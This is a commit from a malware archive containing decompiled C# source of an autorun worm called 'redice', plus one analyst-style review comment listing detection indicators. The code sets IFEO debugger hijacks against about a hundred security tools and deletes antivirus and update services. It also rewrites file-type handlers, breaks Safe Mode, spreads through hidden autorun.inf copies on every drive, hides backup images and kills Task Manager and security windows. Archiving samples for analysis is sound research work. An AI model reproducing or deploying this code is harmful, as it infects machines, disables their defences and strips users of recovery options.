auto-decompiled msil via petikvx

add
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("1481a04a-fe5d-4dce-9d00-2a0a47ff5c44")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("版权所有 (C) 番茄花园 2007")]
[assembly: AssemblyProduct("redice")]
[assembly: AssemblyCompany("番茄花园")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("redice")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,417 @@
// Decompiled with JetBrains decompiler
// Type: redice.ExecRegedit
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using Microsoft.Win32;
namespace redice
{
internal class ExecRegedit
{
public void changeIEtitle()
{
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey1.SetValue("Window Title", (object) "抗日,是全中国人民义不容辞的责任!", RegistryValueKind.String);
registryKey1.Close();
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey2.SetValue("Window Title", (object) "抗日,是全中国人民义不容辞的责任!", RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void setIEStarPage()
{
try
{
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey1.SetValue("start page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey1.SetValue("local page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey1.Close();
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey2.SetValue("start page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey2.SetValue("local page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void killSafeServer()
{
this.execKillSafeServer("navapsvc");
this.execKillSafeServer("wscsvc");
this.execKillSafeServer("KPfwSvc");
this.execKillSafeServer("SNDSrvc");
this.execKillSafeServer("ccProxy");
this.execKillSafeServer("ccEvtMgr");
this.execKillSafeServer("ccSetMgr");
this.execKillSafeServer("SPBBCSvc");
this.execKillSafeServer("Symantec Core LC");
this.execKillSafeServer("NPFMntor");
this.execKillSafeServer("MskService");
this.execKillSafeServer("MskService");
this.execKillSafeServer("FireSvc");
this.execKillSafeServer("avp");
}
private void execKillSafeServer(string serverName)
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Services", true);
try
{
registryKey.DeleteSubKeyTree(serverName);
registryKey.Close();
}
catch
{
}
}
public void delOtherVirusReg()
{
this.delOtherVirusRegMeans("{DE35052A-9E37-4827-A1EC-79BF400D27A4}");
this.delOtherVirusRegMeans("{AEB6717E-7E19-11d0-97EE-00C04FD91972}");
this.delOtherVirusRegMeans("{DD7D4640-4464-48C0-82FD-21338366D2D2}");
this.delOtherVirusRegMeans("{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}");
this.delOtherVirusRegMeans("{131AB311-16F1-F13B-1E43-11A24B51AFD1}");
this.delOtherVirusRegMeans("{274B93C2-A6DF-485F-8576-AB0653134A76}");
this.delOtherVirusRegMeans("{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}");
this.delOtherVirusRegMeans("{0CB68AD9-FF66-3E63-636B-B693E62F6236}");
this.delOtherVirusRegMeans("{09B68AD9-FF66-3E63-636B-B693E62F6236}");
this.delOtherVirusRegMeans("{754FB7D8-B8FE-4810-B363-A788CD060F1F}");
this.delOtherVirusRegMeans("{A6011F8F-A7F8-49AA-9ADA-49127D43138F}");
this.delOtherVirusRegMeans("{06A68AD9-FF56-6E73-937B-B893E72F6226}");
this.delOtherVirusRegMeans("{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}");
this.delOtherVirusRegMeans("{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}");
this.delOtherVirusRegMeans("{BC0ACA58-6A6F-51DA-9EFE-9D20F4F621BA}");
this.delOtherVirusRegMeans("{AEB6717E-7E19-11d0-97EE-00C04FD91972}");
this.delOtherVirusRegMeans("{99F1D023-7CEB-4586-80F7-BB1A98DB7602}");
this.delOtherVirusRegMeans("{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}");
this.delOtherVirusRegMeans("{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}");
this.delOtherVirusRegMeans("{42A612A4-4334-4424-4234-42261A31A236}");
}
private void delOtherVirusRegMeans(string virusRegValue)
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks", true);
try
{
registryKey.DeleteSubKey(virusRegValue, true);
registryKey.Close();
}
catch
{
}
}
public void closeAutoUpdateAndSafeMiddle()
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Services", true);
try
{
registryKey1.DeleteSubKey("SharedAccess", true);
registryKey1.Close();
}
catch
{
}
try
{
registryKey1.DeleteSubKey("wuauserv", true);
registryKey1.Close();
}
catch
{
}
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\update", true);
try
{
registryKey2.SetValue("UpdateMode", (object) 0, RegistryValueKind.DWord);
}
catch
{
}
}
public void recomposeFileRelating()
{
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("batfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("cmdfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("comfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("regfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("scrfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("isofile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("piffile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
}
public void fileImageHijack()
{
this.addFileImageHijack("360rpt.exe");
this.addFileImageHijack("360Safe.exe");
this.addFileImageHijack("360tray.exe");
this.addFileImageHijack("adam.exe");
this.addFileImageHijack("AgentSvr.exe");
this.addFileImageHijack("AppSvc32.exe");
this.addFileImageHijack("AST.exe");
this.addFileImageHijack("autoruns.exe");
this.addFileImageHijack("avgrssvc.exe");
this.addFileImageHijack("AvMonitor.exe");
this.addFileImageHijack("avp.com");
this.addFileImageHijack("avp.exe");
this.addFileImageHijack("CCenter.exe");
this.addFileImageHijack("ccSvcHst.exe");
this.addFileImageHijack("FileDsty.exe");
this.addFileImageHijack("FTCleanerShell.exe");
this.addFileImageHijack("HijackThis.exe");
this.addFileImageHijack("IceSword.exe");
this.addFileImageHijack("iparmo.exe");
this.addFileImageHijack("Iparmor.exe");
this.addFileImageHijack("isPwdSvc.exe");
this.addFileImageHijack("kabaload.exe");
this.addFileImageHijack("KaScrScn.SCR");
this.addFileImageHijack("KASMain.exe");
this.addFileImageHijack("KASTask.exe");
this.addFileImageHijack("KAV32.exe");
this.addFileImageHijack("KAVDX.exe");
this.addFileImageHijack("KAVPFW.exe");
this.addFileImageHijack("KAVSetup.exe");
this.addFileImageHijack("KAVStart.exe");
this.addFileImageHijack("KISLnchr.exe");
this.addFileImageHijack("KMailMon.exe");
this.addFileImageHijack("KMFilter.exe");
this.addFileImageHijack("KPFW32.exe");
this.addFileImageHijack("KPFW32X.exe");
this.addFileImageHijack("KPFWSvc.exe");
this.addFileImageHijack("KRegEx.exe");
this.addFileImageHijack("krepair.COM");
this.addFileImageHijack("KsLoader.exe");
this.addFileImageHijack("KVCenter.kxp");
this.addFileImageHijack("KvDetect.exe");
this.addFileImageHijack("KvfwMcl.exe");
this.addFileImageHijack("KVMonXP.kxp");
this.addFileImageHijack("KVMonXP_1.kxp");
this.addFileImageHijack("kvol.exe");
this.addFileImageHijack("kvolself.exe");
this.addFileImageHijack("KvReport.kxp");
this.addFileImageHijack("KVScan.kxp");
this.addFileImageHijack("KVSrvXP.exe");
this.addFileImageHijack("KVStub.kxp");
this.addFileImageHijack("kvupload.exe");
this.addFileImageHijack("kvwsc.exe");
this.addFileImageHijack("KvXP.kxp");
this.addFileImageHijack("KvXP_1.kxp");
this.addFileImageHijack("KWatch.exe");
this.addFileImageHijack("KWatch9x.exe");
this.addFileImageHijack("KWatchX.exe");
this.addFileImageHijack("loaddll.exe");
this.addFileImageHijack("MagicSet.exe");
this.addFileImageHijack("mcconsol.exe");
this.addFileImageHijack("mmqczj.exe");
this.addFileImageHijack("mmsk.exe");
this.addFileImageHijack("NAVSetup.exe");
this.addFileImageHijack("nod32krn.exe");
this.addFileImageHijack("nod32kui.exe");
this.addFileImageHijack("PFW.exe");
this.addFileImageHijack("PFWLiveUpdate.exe");
this.addFileImageHijack("QHSET.exe");
this.addFileImageHijack("Ras.exe");
this.addFileImageHijack("Rav.exe");
this.addFileImageHijack("RavMon.exe");
this.addFileImageHijack("RavMonD.exe");
this.addFileImageHijack("RavStub.exe");
this.addFileImageHijack("RavTask.exe");
this.addFileImageHijack("RegClean.exe");
this.addFileImageHijack("rfwcfg.exe");
this.addFileImageHijack("RfwMain.exe");
this.addFileImageHijack("rfwProxy.exe");
this.addFileImageHijack("rfwsrv.exe");
this.addFileImageHijack("RsAgent.exe");
this.addFileImageHijack("Rsaupd.exe");
this.addFileImageHijack("runiep.exe");
this.addFileImageHijack("safelive.exe");
this.addFileImageHijack("scan32.exe");
this.addFileImageHijack("shcfg32.exe");
this.addFileImageHijack("SmartUp.exe");
this.addFileImageHijack("SREng.exe");
this.addFileImageHijack("symlcsvc.exe");
this.addFileImageHijack("SysSafe.exe");
this.addFileImageHijack("TrojanDetector.exe");
this.addFileImageHijack("Trojanwall.exe");
this.addFileImageHijack("TrojDie.kxp");
this.addFileImageHijack("UIHost.exe");
this.addFileImageHijack("UmxAgent.exe");
this.addFileImageHijack("UmxAttachment.exe");
this.addFileImageHijack("UmxCfg.exe");
this.addFileImageHijack("UmxFwHlp.exe");
this.addFileImageHijack("UmxPol.exe");
this.addFileImageHijack("UpLive.EXE.exe");
this.addFileImageHijack("WoptiClean.exe");
this.addFileImageHijack("zxsweep.exe");
}
private void addFileImageHijack(string safeSoftName)
{
try
{
string name = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options";
string str = "c:\\services.exe";
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(name, true);
registryKey1.CreateSubKey(safeSoftName);
registryKey1.Close();
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey(name + "\\" + safeSoftName, true);
registryKey2.SetValue("Debugger", (object) str, RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void delRegeditHideFile()
{
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL", true);
try
{
registryKey.DeleteValue("CheckedValue", true);
}
catch
{
}
try
{
registryKey.SetValue("CheckedValue", (object) 0, RegistryValueKind.String);
}
catch
{
}
}
catch
{
}
}
public void uodateRegeditAutoRun()
{
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("software\\microsoft\\windows\\currentversion\\run", true);
registryKey1.SetValue("WinSystem", (object) "c:\\services.exe", RegistryValueKind.String);
registryKey1.Close();
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\windows\\currentversion\\run", true);
registryKey2.SetValue("WinSystem", (object) "c:\\services.exe", RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void destroySafeMode()
{
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal", true);
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network", true);
RegistryKey registryKey3 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal", true);
RegistryKey registryKey4 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network", true);
try
{
registryKey1.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
try
{
registryKey2.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
try
{
registryKey3.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
try
{
registryKey4.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
}
catch
{
}
}
}
}
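Review bot: This file has no analyst-facing summary, and every registry write sits inside an empty `catch { }`, so the listing alone does not show which changes actually land on a given host. I would add a header comment above `class ExecRegedit` such as `// ANALYSIS: registry tampering - IFEO "Debugger" and Run "WinSystem" values pointing at c:\services.exe, shell\open\command rewrites, SafeBoot and Services key deletions; failures are swallowed, so confirm each artifact on the host.` For detection, the `Debugger` values written under `Image File Execution Options` by `addFileImageHijack` and the `WinSystem` Run value set in `uodateRegeditAutoRun` are the most specific indicators visible here. In `closeAutoUpdateAndSafeMiddle` the same key object is closed after the first delete and then reused for the second, so responders should check the `SharedAccess` and `wuauserv` service keys directly rather than assume both were removed.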
@@ -0,0 +1,730 @@
// Decompiled with JetBrains decompiler
// Type: redice.Form1
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace redice
{
public class Form1 : Form
{
private ExecRegedit objExecRegdit = new ExecRegedit();
private IContainer components;
private System.Windows.Forms.Timer timeCloseSafesoft;
private System.Windows.Forms.Timer timerLong20;
private System.Windows.Forms.Timer timerMid5;
private int PrevInstance() => Process.GetProcessesByName(Process.GetCurrentProcess().ProcessName).GetUpperBound(0);
public Form1() => this.InitializeComponent();
private void Form1_Load(object sender, EventArgs e)
{
try
{
try
{
Process.GetCurrentProcess();
string processName = Process.GetCurrentProcess().ProcessName;
if (Process.GetCurrentProcess().ProcessName.ToLower().ToString().Equals("services"))
{
if (this.PrevInstance() > 1)
Application.Exit();
}
else if (this.PrevInstance() > 0)
Application.Exit();
}
catch
{
}
try
{
this.hideForm();
}
catch
{
}
try
{
this.changeSystemTime();
}
catch
{
}
try
{
this.objExecRegdit.destroySafeMode();
}
catch
{
}
try
{
this.objExecRegdit.delRegeditHideFile();
}
catch
{
}
try
{
this.objExecRegdit.uodateRegeditAutoRun();
}
catch
{
}
try
{
this.objExecRegdit.setIEStarPage();
}
catch
{
}
try
{
this.objExecRegdit.changeIEtitle();
}
catch
{
}
}
catch
{
}
try
{
if (!this.IsRemove(AppDomain.CurrentDomain.BaseDirectory.Substring(0, 1).ToUpper() + ":\\"))
return;
Process.Start("c:\\services.exe");
Application.Exit();
}
catch
{
}
}
private void timeCloseSafesoft_Tick(object sender, EventArgs e)
{
try
{
this.closeSafeSoft();
}
catch
{
}
}
private void timerLong20_Tick(object sender, EventArgs e)
{
try
{
this.delUImmunityCreateAutorun();
}
catch
{
}
try
{
this.copyVirusReName();
}
catch
{
}
}
private void timerMid5_Tick(object sender, EventArgs e)
{
try
{
this.changeSystemTime();
}
catch
{
}
try
{
this.objExecRegdit.destroySafeMode();
}
catch
{
}
try
{
this.objExecRegdit.fileImageHijack();
}
catch
{
}
try
{
this.objExecRegdit.delRegeditHideFile();
}
catch
{
}
try
{
this.objExecRegdit.recomposeFileRelating();
}
catch
{
}
try
{
this.objExecRegdit.delOtherVirusReg();
}
catch
{
}
try
{
this.findAllGhoPath();
}
catch
{
}
try
{
this.objExecRegdit.killSafeServer();
}
catch
{
}
try
{
this.objExecRegdit.closeAutoUpdateAndSafeMiddle();
}
catch
{
}
try
{
this.objExecRegdit.uodateRegeditAutoRun();
}
catch
{
}
try
{
this.objExecRegdit.setIEStarPage();
}
catch
{
}
try
{
this.objExecRegdit.changeIEtitle();
}
catch
{
}
}
private void copyVirusReName()
{
Process p = new Process();
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int index = 0; index < logicalDrives.Length; ++index)
{
string currentDirectory = Directory.GetCurrentDirectory();
string fileName = Path.GetFileName(Application.ExecutablePath);
string upper = logicalDrives[index].ToString().Substring(0, 1).ToUpper();
if (!upper.Equals("A"))
{
if (!this.IsCDRom(logicalDrives[index].ToString()))
{
try
{
File.Copy(currentDirectory + "\\" + fileName, upper + ":\\services.exe", true);
File.SetAttributes(upper + ":\\services.exe", FileAttributes.Normal);
File.SetAttributes(upper + ":\\services.exe", FileAttributes.ReadOnly);
FileAttributes attributes1 = File.GetAttributes(upper + ":\\services.exe");
File.SetAttributes(upper + ":\\services.exe", attributes1 | FileAttributes.System);
FileAttributes attributes2 = File.GetAttributes(upper + ":\\services.exe");
File.SetAttributes(upper + ":\\services.exe", attributes2 | FileAttributes.Hidden);
string str1 = upper + ":\\services.exe";
string str2 = upper + ":\\hotice..\\";
p = this.execCmd(p);
Thread.Sleep(25);
p.StandardInput.WriteLine("md " + upper + ":\\hotice..\\");
string str3 = "copy " + str1 + " " + str2;
Thread.Sleep(25);
p.StandardInput.WriteLine(str3);
p.Dispose();
p.Close();
}
catch
{
}
}
}
}
}
catch
{
}
}
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
private static extern int GetDriveType(string driveinfo);
public bool IsCDRom(string driveInfo)
{
switch (driveInfo)
{
case "":
case null:
return false;
default:
return Form1.GetDriveType(driveInfo) == 5;
}
}
public bool IsRemove(string driveInfo)
{
switch (driveInfo)
{
case "":
case null:
return false;
default:
return Form1.GetDriveType(driveInfo) == 2;
}
}
private void delUImmunityCreateAutorun()
{
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int index = 0; index < logicalDrives.Length; ++index)
{
string upper = logicalDrives[index].ToString().Substring(0, 1).ToUpper();
if (!this.IsCDRom(logicalDrives[index].ToString()))
{
if (!upper.Equals("A"))
{
try
{
this.execDelUImmunityCreateAutorun(upper);
}
catch
{
}
}
}
}
}
catch
{
}
}
private void execDelUImmunityCreateAutorun(string rootPath)
{
string path1 = rootPath + ":\\autorun.inf";
if (File.Exists(path1))
{
File.SetAttributes(path1, FileAttributes.Normal);
File.Delete(path1);
this.buildAutoruninf(rootPath);
}
else if (Directory.Exists(path1))
{
File.SetAttributes(path1, FileAttributes.Normal);
try
{
Directory.Delete(path1, true);
}
catch
{
Directory.GetFiles(path1);
foreach (FileInfo file in new DirectoryInfo(path1).GetFiles())
{
string path2 = path1 + "\\" + file.ToString();
File.SetAttributes(path2, FileAttributes.Normal);
File.Delete(path2);
}
}
try
{
Directory.Delete(path1, true);
}
catch
{
try
{
Process process = this.execCmd(new Process());
string str = "rd /q/s " + rootPath + ":\\autorun.inf\\";
process.StandardInput.WriteLine(str);
process.Close();
}
catch
{
}
}
try
{
File.SetAttributes(path1, FileAttributes.Normal);
Directory.Delete(path1, true);
}
catch
{
}
this.buildAutoruninf(rootPath);
}
else
{
try
{
this.buildAutoruninf(rootPath);
}
catch
{
}
}
}
private Process execCmd(Process p)
{
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.Start();
return p;
}
private void buildAutoruninf(string rootPath)
{
try
{
string path = rootPath + ":\\autorun.inf";
File.SetAttributes(path, FileAttributes.Normal);
Directory.Delete(path, true);
}
catch
{
}
try
{
using (StreamWriter streamWriter = new StreamWriter(rootPath + ":\\autorun.inf"))
{
streamWriter.WriteLine("[autorun]");
streamWriter.WriteLine("OPEN=" + rootPath + ":\\services.exe");
streamWriter.WriteLine("shell\\open\\Command=" + rootPath + ":\\services.exe");
streamWriter.WriteLine("shell\\open\\Default=");
streamWriter.Write("shell\\explore\\Command=" + rootPath + ":\\services.exe");
}
File.SetAttributes(rootPath + ":\\autorun.inf", FileAttributes.Normal);
File.SetAttributes(rootPath + ":\\autorun.inf", FileAttributes.ReadOnly);
FileAttributes attributes1 = File.GetAttributes(rootPath + ":\\autorun.inf");
File.SetAttributes(rootPath + ":\\autorun.inf", attributes1 | FileAttributes.System);
FileAttributes attributes2 = File.GetAttributes(rootPath + ":\\autorun.inf");
File.SetAttributes(rootPath + ":\\autorun.inf", attributes2 | FileAttributes.Hidden);
}
catch
{
}
}
private void findAllGhoPath()
{
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int index = 0; index < logicalDrives.Length; ++index)
{
string upper = logicalDrives[index].ToString().Substring(0, 1).ToUpper();
if (!this.IsCDRom(logicalDrives[index].ToString()))
{
if (!upper.Equals("A"))
{
try
{
this.delGhoGetPath(upper);
this.delGhoGetPath(upper + ":\\sysbak\\");
this.delGhoGetPath(upper + ":\\beifen\\");
}
catch
{
}
}
}
}
}
catch
{
}
}
private void delGhoGetPath(string path)
{
try
{
if (path.Length == 1)
this.checkDelGho(Directory.GetFiles(path + ":\\"));
else
this.checkDelGho(Directory.GetFiles(path));
}
catch
{
}
}
private void checkDelGho(string[] ghoRootPath)
{
foreach (string str1 in ghoRootPath)
{
int length = str1.Length;
try
{
string str2 = str1.Substring(length - 4, 4);
if (!str2.ToUpper().Equals(".GHO") && !str2.ToUpper().Equals(".BKF") && !str2.ToUpper().Equals(".PQI") && !str2.ToUpper().Equals(".TIB"))
{
if (!str2.ToUpper().Equals(".BAK"))
continue;
}
File.SetAttributes(str1, FileAttributes.Normal);
string str3 = str1 + ".bek";
File.Move(str1, str3);
File.SetAttributes(str3, FileAttributes.Hidden);
}
catch
{
}
}
}
private void changeSystemTime()
{
try
{
Form1.SystemTime st = new Form1.SystemTime();
Form1.LibWrapDateTime.GetLocalTime(st);
st.wYear = (ushort) 2006;
Form1.LibWrapDateTime.SetLocalTime(st);
}
catch
{
}
}
private void hideForm()
{
try
{
this.Hide();
}
catch
{
}
}
private void closeSafeSoft()
{
foreach (Process process in Process.GetProcesses())
{
try
{
if (process.MainWindowTitle.Length >= 1)
{
string mainWindowTitle = process.MainWindowTitle;
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "兔子拜佛专杀"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "报警"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "举报"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "流氓软件"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "恶意软件"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "IceSword"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "进程"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "系统配置"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "注册表"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "彻底清除"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "winrar"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "icesword"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "SYMANTEC"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "cmd"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "c:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "d:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "e:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "f:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "g:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "h:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "i:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "j:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "求救"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "日本の陛下"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "日文学习"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "任务管理器"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "btbaicai"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "wopticlean"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "IE修复"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "新病毒"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "procexp"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "autoruns"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "GMER"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "PAVARK"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "提取"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "上报"))
process.Kill();
}
else
{
string processName = process.ProcessName;
if (this.execCloseSafeSoftUnHaveTitle(processName, "AUTOUPDATE.EXE"))
process.Kill();
if (this.execCloseSafeSoftUnHaveTitle(processName, "AUTOTRACE.EXE"))
process.Kill();
if (this.execCloseSafeSoftUnHaveTitle(processName, "AUTODOWN.EXE"))
process.Kill();
}
}
catch
{
}
}
}
private bool execCloseSafeSoftHaveTitle(string thisProcess, string title)
{
try
{
return thisProcess.ToString().ToUpper().IndexOf(title.ToUpper()) != -1;
}
catch
{
return false;
}
}
private bool execCloseSafeSoftUnHaveTitle(string thisProcess, string process)
{
try
{
return thisProcess.ToString().ToUpper().Equals(process.ToUpper());
}
catch
{
return false;
}
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1));
this.timeCloseSafesoft = new System.Windows.Forms.Timer(this.components);
this.timerLong20 = new System.Windows.Forms.Timer(this.components);
this.timerMid5 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout();
this.timeCloseSafesoft.Enabled = true;
this.timeCloseSafesoft.Interval = 1500;
this.timeCloseSafesoft.Tick += new EventHandler(this.timeCloseSafesoft_Tick);
this.timerLong20.Enabled = true;
this.timerLong20.Interval = 20000;
this.timerLong20.Tick += new EventHandler(this.timerLong20_Tick);
this.timerMid5.Enabled = true;
this.timerMid5.Interval = 10000;
this.timerMid5.Tick += new EventHandler(this.timerMid5_Tick);
this.AutoScaleMode = AutoScaleMode.None;
this.BackColor = Color.White;
this.BackgroundImageLayout = ImageLayout.None;
this.ClientSize = new Size(112, 27);
this.ControlBox = false;
this.Cursor = Cursors.Hand;
this.FormBorderStyle = FormBorderStyle.None;
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.SizeGripStyle = SizeGripStyle.Hide;
this.StartPosition = FormStartPosition.Manual;
this.TransparencyKey = Color.White;
this.WindowState = FormWindowState.Minimized;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
private enum DriveType
{
NotExist = 1,
FloppyOrUsb = 2,
FixedDisk = 3,
NetDisk = 4,
CDRom = 5,
RAMDisk = 6,
}
public class LibWrapDateTime
{
[DllImport("Kernel32.dll")]
public static extern void GetLocalTime(Form1.SystemTime st);
[DllImport("Kernel32.dll")]
